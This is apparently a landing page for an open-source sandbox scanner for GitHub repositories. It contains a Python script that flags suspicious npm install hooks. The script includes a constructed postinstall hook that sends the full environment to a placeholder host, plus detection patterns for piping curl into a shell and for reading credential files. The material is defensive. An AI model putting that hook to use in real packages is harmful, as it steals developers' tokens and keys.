Open source ships malware, too.
ClaudeRabbit is a free, open-source security product for the developer community. Paste any public GitHub repo and we clone it into an isolated sandbox, run it for real, and hand back one honest safety score: what the project is, what it did when we ran it, and what we could not verify.
The danger board
The lowest-scoring repositories we've flagged, named and ranked, updated as their scores change.
We protect the world from open-source malware.
ClaudeRabbit is a real security product, free and open-source, with one mission: protect the world from open-source malware, and grow from there toward cybersecurity more broadly. We start where the threat is most personal: the developers who clone and run unknown code every day. A repo or package can run hostile code the moment you install it, through an install hook or a setup script, draining GitHub tokens, cloud keys, and crypto wallets before a build even finishes. More than 454,600 new malicious open-source packages appeared in 2025, up 75% in a year, and the attacks that matter carry no CVE at all: a scanner that matches known vulnerability identifiers never sees them, because the malicious behaviour exists only when the code is installed or run. So we run the code: every scan clones the repo into a disposable, isolated sandbox, executes it, and watches what it actually does.
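The install-time vector described above is worth seeing concretely. The script below is an added example, not ClaudeRabbit's own code or scoring logic: it reads a package.json, lists the npm lifecycle scripts that run automatically during `npm install` (preinstall, install, postinstall, prepare), and matches each against a few illustrative indicators of hostile behaviour. The indicator patterns and both sample manifests are constructed for this example and are not a vetted ruleset.

```python
"""Flag npm lifecycle scripts before `npm install` executes them.

Added example, not ClaudeRabbit code. npm runs preinstall/install/postinstall
scripts automatically, so a hostile package executes before any build step.
The heuristics and sample package.json documents below are constructed here.
"""
import json
import re

# Lifecycle scripts npm may run on its own during an install.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Illustrative indicators of an install hook doing something hostile.
# Chosen for this example; a real scanner needs a far richer ruleset.
SUSPICIOUS = {
    "downloads and runs remote code": re.compile(r"(curl|wget)\b.*\|\s*(sh|bash|node)"),
    "reads environment secrets": re.compile(r"process\.env|printenv|\$\{?[A-Z_]*(TOKEN|KEY|SECRET)"),
    "touches credential files": re.compile(r"\.npmrc|\.aws/credentials|\.ssh|\.git-credentials"),
    "obfuscated payload": re.compile(r"base64|eval\(|Buffer\.from\("),
}


def audit_install_scripts(package_json: str) -> list:
    """Return one finding per lifecycle script present, with matched indicators."""
    pkg = json.loads(package_json)
    scripts = pkg.get("scripts", {})
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if cmd is None:
            continue
        indicators = [label for label, rx in SUSPICIOUS.items() if rx.search(cmd)]
        findings.append({"hook": hook, "command": cmd, "indicators": indicators})
    return findings


def verdict(findings: list) -> str:
    """'block' if any hook matched an indicator, 'review' if hooks exist, else 'clean'."""
    if any(f["indicators"] for f in findings):
        return "block"
    return "review" if findings else "clean"


# Constructed sample: a postinstall hook that POSTs the whole environment away.
# The package name and host are invented; example.invalid never resolves.
SAMPLE_MALICIOUS = json.dumps({
    "name": "example-pkg",
    "version": "1.0.0",
    "scripts": {
        "postinstall": "node -e \"require('https').request({hostname:'example.invalid',"
                       "method:'POST'}).end(JSON.stringify(process.env))\"",
        "test": "jest",
    },
})

# Constructed sample: a hook is present but matches no indicator; still worth a look.
SAMPLE_HOOK_ONLY = json.dumps({
    "name": "example-native",
    "version": "2.0.0",
    "scripts": {"postinstall": "node scripts/patch-binaries.js", "test": "jest"},
})

# Constructed sample: no lifecycle hooks at all.
SAMPLE_CLEAN = json.dumps({
    "name": "example-clean",
    "version": "1.0.0",
    "scripts": {"build": "tsc", "test": "jest"},
})


if __name__ == "__main__":
    for name, sample in (("malicious", SAMPLE_MALICIOUS),
                         ("hook-only", SAMPLE_HOOK_ONLY),
                         ("clean", SAMPLE_CLEAN)):
        findings = audit_install_scripts(sample)
        print(f"{name}: {verdict(findings)}")
        for f in findings:
            print(f"  {f['hook']}: {f['command']!r} -> {f['indicators']}")
```

A static check like this only tells you that a hook exists and looks odd; it cannot tell you what the hook does when it runs, which is the gap a sandboxed execution fills. Until a verdict is in hand, `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) stops lifecycle hooks from running at all.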
It is a public good. Every scan we finish becomes a permanent public report, growing a shared, vetted-repo database that belongs to the whole community — never locked behind a paywall. Signing in only saves your history and adds to that shared record; it never buys you more.
Use it everywhere you already work.
The web report is one surface. ClaudeRabbit also ships as an MCP server and a CLI, so the same honest, evidence-backed verdict is one call away — from an AI coding tool, a terminal, or a pre-install hook — without ever leaving where you already are.